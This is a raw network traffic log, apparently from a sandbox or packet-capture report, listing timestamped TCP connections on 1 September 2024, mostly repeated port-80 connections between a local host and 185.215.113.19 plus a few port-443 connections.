Sep 1, 2024 06:30:03.161838055 CEST	80	49874	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.161942959 CEST	49874	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.162012100 CEST	80	49873	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.162174940 CEST	49874	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.162242889 CEST	49873	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.167114019 CEST	80	49874	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.902776957 CEST	80	49874	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.902901888 CEST	49874	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.907144070 CEST	49874	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.907499075 CEST	49875	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.914582968 CEST	80	49875	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.914730072 CEST	49875	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.915111065 CEST	49875	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.915934086 CEST	80	49874	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:03.915981054 CEST	49874	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:03.920788050 CEST	80	49875	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:04.879638910 CEST	80	49875	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:04.879755974 CEST	49875	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:04.983283997 CEST	49875	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:04.983773947 CEST	49876	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:04.988912106 CEST	80	49875	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:04.988939047 CEST	80	49876	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:04.989032030 CEST	49876	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:04.989032030 CEST	49875	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:04.989132881 CEST	49876	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:04.994059086 CEST	80	49876	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:05.756460905 CEST	80	49876	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:05.756513119 CEST	49876	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:05.761265039 CEST	49876	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:05.761854887 CEST	49877	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:05.766686916 CEST	80	49876	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:05.766827106 CEST	49876	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:05.767304897 CEST	80	49877	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:05.767365932 CEST	49877	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:05.767600060 CEST	49877	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:05.772696972 CEST	80	49877	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:06.541378021 CEST	80	49877	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:06.541430950 CEST	49877	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:06.660567999 CEST	49877	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:06.661065102 CEST	49878	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:06.666523933 CEST	80	49877	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:06.666574955 CEST	49877	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:06.666857004 CEST	80	49878	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:06.666915894 CEST	49878	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:06.667370081 CEST	49878	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:06.674283028 CEST	80	49878	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:07.324083090 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:07.324112892 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:07.404752970 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:07.404774904 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:07.418010950 CEST	80	49878	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:07.418145895 CEST	49878	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:07.420566082 CEST	49878	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:07.420571089 CEST	49879	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:07.425652027 CEST	80	49879	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:07.426110029 CEST	80	49878	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:07.426235914 CEST	49878	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:07.426235914 CEST	49879	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:07.426306963 CEST	49879	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:07.433001995 CEST	80	49879	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:07.959566116 CEST	49813	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:07.959608078 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:07.962538004 CEST	49812	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:30:07.962570906 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:30:08.185991049 CEST	80	49879	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:08.186080933 CEST	49879	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:08.298526049 CEST	49879	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:08.298912048 CEST	49881	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:08.306337118 CEST	80	49881	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:08.306395054 CEST	49881	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:08.306642056 CEST	49881	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:08.308604002 CEST	80	49879	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:08.308650970 CEST	49879	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:08.314169884 CEST	80	49881	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:09.435884953 CEST	80	49881	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:09.435904026 CEST	80	49881	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:09.435981989 CEST	49881	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:09.438654900 CEST	49881	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:09.438966990 CEST	49882	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:09.443916082 CEST	80	49881	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:09.444051981 CEST	80	49882	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:09.444142103 CEST	49882	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:09.444142103 CEST	49881	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:09.444837093 CEST	49882	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:09.449727058 CEST	80	49882	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:10.747200966 CEST	80	49882	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:10.747256041 CEST	49882	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:10.747879982 CEST	80	49882	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:10.747921944 CEST	49882	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:10.750319004 CEST	80	49882	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:10.750359058 CEST	49882	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:10.859029055 CEST	49883	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:10.859030008 CEST	49882	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:10.864001036 CEST	80	49883	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:10.864614010 CEST	80	49882	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:10.864764929 CEST	49883	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:10.864764929 CEST	49882	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:10.868751049 CEST	49883	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:10.873538017 CEST	80	49883	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:11.639899969 CEST	80	49883	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:11.640029907 CEST	49883	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:11.645136118 CEST	49883	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:11.645140886 CEST	49884	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:11.654181957 CEST	80	49884	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:11.654314995 CEST	49884	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:11.654396057 CEST	49884	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:11.656954050 CEST	80	49883	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:11.661360979 CEST	49883	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:11.664172888 CEST	80	49884	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:12.409432888 CEST	80	49884	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:12.409482956 CEST	49884	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:12.515665054 CEST	49884	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:12.516020060 CEST	49885	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:12.520992041 CEST	80	49884	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:12.521039009 CEST	49884	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:12.521498919 CEST	80	49885	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:12.521558046 CEST	49885	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:12.521786928 CEST	49885	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:12.526735067 CEST	80	49885	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:13.284802914 CEST	80	49885	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:13.288866043 CEST	49885	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:13.291394949 CEST	49885	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:13.291394949 CEST	49886	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:13.296530008 CEST	80	49886	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:13.296693087 CEST	80	49885	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:13.296741962 CEST	49886	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:13.296799898 CEST	49885	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:13.301039934 CEST	49886	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:13.305949926 CEST	80	49886	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:14.077392101 CEST	80	49886	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:14.077445030 CEST	49886	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.189169884 CEST	49886	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.189507008 CEST	49887	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.194755077 CEST	80	49886	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:14.194812059 CEST	49886	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.194930077 CEST	80	49887	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:14.194988966 CEST	49887	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.195271015 CEST	49887	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.201272964 CEST	80	49887	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:14.941607952 CEST	80	49887	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:14.947850943 CEST	49887	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.947850943 CEST	49887	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.948782921 CEST	49888	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.958477974 CEST	80	49888	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:14.959053993 CEST	80	49887	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:14.960927010 CEST	49887	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.960928917 CEST	49888	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.964756966 CEST	49888	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:14.969949961 CEST	80	49888	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:15.712637901 CEST	80	49888	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:15.712784052 CEST	49888	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:15.829338074 CEST	49888	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:15.829648972 CEST	49889	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:15.834662914 CEST	80	49888	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:15.834733009 CEST	49888	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:15.835530996 CEST	80	49889	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:15.835598946 CEST	49889	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:15.836154938 CEST	49889	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:15.842143059 CEST	80	49889	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:16.583749056 CEST	80	49889	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:16.583811045 CEST	49889	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:16.587402105 CEST	49889	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:16.587800026 CEST	49890	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:16.592484951 CEST	80	49889	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:16.592541933 CEST	49889	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:16.593281984 CEST	80	49890	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:16.593353033 CEST	49890	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:16.593467951 CEST	49890	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:16.598532915 CEST	80	49890	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:17.122757912 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:30:17.122793913 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:30:17.293773890 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:30:17.293848991 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:30:17.358562946 CEST	80	49890	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:17.365842104 CEST	49890	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:17.557754040 CEST	49890	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:17.557770014 CEST	49891	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:17.563133955 CEST	80	49890	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:17.563466072 CEST	80	49891	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:17.566824913 CEST	49890	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:17.566826105 CEST	49891	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:17.567154884 CEST	49891	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:17.572025061 CEST	80	49891	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:18.328773022 CEST	80	49891	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:18.328862906 CEST	49891	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:18.333123922 CEST	49891	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:18.333410978 CEST	49892	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:18.338570118 CEST	80	49892	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:18.338630915 CEST	49892	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:18.338712931 CEST	80	49891	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:18.338753939 CEST	49891	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:18.339299917 CEST	49892	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:18.344150066 CEST	80	49892	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:19.509068966 CEST	80	49892	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:19.509146929 CEST	80	49892	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:19.509222984 CEST	49892	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:19.626220942 CEST	49892	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:19.626230955 CEST	49893	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:19.631278038 CEST	80	49893	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:19.631730080 CEST	80	49892	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:19.634905100 CEST	49892	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:19.634917021 CEST	49893	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:19.637778044 CEST	49893	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:19.642544031 CEST	80	49893	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:20.396526098 CEST	80	49893	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:20.396579027 CEST	49893	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:20.400122881 CEST	49893	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:20.400579929 CEST	49894	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:20.406362057 CEST	80	49893	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:20.406373978 CEST	80	49894	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:20.406415939 CEST	49893	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:20.406462908 CEST	49894	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:20.406785011 CEST	49894	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:20.413511038 CEST	80	49894	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:21.197861910 CEST	80	49894	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:21.198028088 CEST	49894	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:21.313021898 CEST	49894	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:21.313431978 CEST	49895	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:21.546931028 CEST	80	49895	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:21.546957970 CEST	80	49894	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:21.547041893 CEST	49894	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:21.547252893 CEST	49895	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:21.548779011 CEST	49895	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:21.555588961 CEST	80	49895	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:22.310353041 CEST	80	49895	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:22.310399055 CEST	49895	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:22.317116976 CEST	49895	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:22.317681074 CEST	49896	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:22.322355032 CEST	80	49895	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:22.322398901 CEST	49895	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:22.322607994 CEST	80	49896	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:22.322670937 CEST	49896	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:22.327008963 CEST	49896	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:22.331836939 CEST	80	49896	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:23.076364994 CEST	80	49896	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:23.078855038 CEST	49896	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.186405897 CEST	49896	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.186803102 CEST	49897	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.191847086 CEST	80	49897	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:23.191996098 CEST	49897	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.192022085 CEST	80	49896	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:23.192236900 CEST	49896	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.192336082 CEST	49897	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.197283030 CEST	80	49897	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:23.933878899 CEST	80	49897	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:23.933933020 CEST	49897	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.937421083 CEST	49897	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.937751055 CEST	49898	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.943500042 CEST	80	49898	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:23.943555117 CEST	49898	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.943643093 CEST	80	49897	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:23.943700075 CEST	49897	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.943778992 CEST	49898	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:23.949054956 CEST	80	49898	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:24.690993071 CEST	80	49898	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:24.691049099 CEST	49898	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:24.812475920 CEST	49898	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:24.812477112 CEST	49899	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:24.818696022 CEST	80	49898	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:24.818784952 CEST	49898	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:24.818830013 CEST	80	49899	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:24.819225073 CEST	49899	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:24.819926977 CEST	49899	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:24.825792074 CEST	80	49899	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:26.113018990 CEST	80	49899	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:26.113037109 CEST	80	49899	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:26.113045931 CEST	80	49899	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:26.113071918 CEST	49899	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:26.113101959 CEST	49899	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:26.113146067 CEST	49899	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:26.116995096 CEST	49899	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:26.117347002 CEST	49900	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:26.122569084 CEST	80	49900	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:26.122626066 CEST	49900	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:26.122663021 CEST	80	49899	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:26.122704983 CEST	49899	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:26.123132944 CEST	49900	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:26.130743027 CEST	80	49900	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:26.896142960 CEST	80	49900	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:26.901771069 CEST	49900	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.021737099 CEST	49900	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.021739006 CEST	49901	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.027146101 CEST	80	49900	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:27.027158976 CEST	80	49901	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:27.030894041 CEST	49901	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.030894995 CEST	49900	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.033768892 CEST	49901	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.038580894 CEST	80	49901	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:27.792512894 CEST	80	49901	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:27.792809010 CEST	49901	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.797122002 CEST	49901	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.797491074 CEST	49902	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.802942991 CEST	80	49901	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:27.802989960 CEST	49901	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.803096056 CEST	80	49902	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:27.803159952 CEST	49902	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.803415060 CEST	49902	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:27.808445930 CEST	80	49902	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:28.552489996 CEST	80	49902	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:28.552540064 CEST	49902	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:28.672655106 CEST	49902	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:28.673002005 CEST	49903	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:28.679117918 CEST	80	49903	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:28.679141045 CEST	80	49902	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:28.679176092 CEST	49903	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:28.679198027 CEST	49902	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:28.679476976 CEST	49903	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:28.684891939 CEST	80	49903	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:29.438462973 CEST	80	49903	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:29.445024014 CEST	49903	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:29.483942986 CEST	49904	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:29.483951092 CEST	49903	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:29.489239931 CEST	80	49904	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:29.489367962 CEST	80	49903	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:29.489402056 CEST	49904	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:29.489481926 CEST	49903	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:29.492850065 CEST	49904	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:29.497885942 CEST	80	49904	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:30.235769033 CEST	80	49904	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:30.235841990 CEST	49904	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:30.353135109 CEST	49904	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:30.354376078 CEST	49905	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:30.358239889 CEST	80	49904	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:30.358335018 CEST	49904	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:30.359240055 CEST	80	49905	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:30.359311104 CEST	49905	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:30.362751961 CEST	49905	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:30.368294954 CEST	80	49905	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:31.146542072 CEST	80	49905	185.215.113.19	192.168.2.5
Sep 1, 2024 06:30:31.146645069 CEST	49905	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:31.149614096 CEST	49906	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:31.149614096 CEST	49905	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:30:31.155611992 CEST	80	49906	185.215.113.19	192.168.2.5
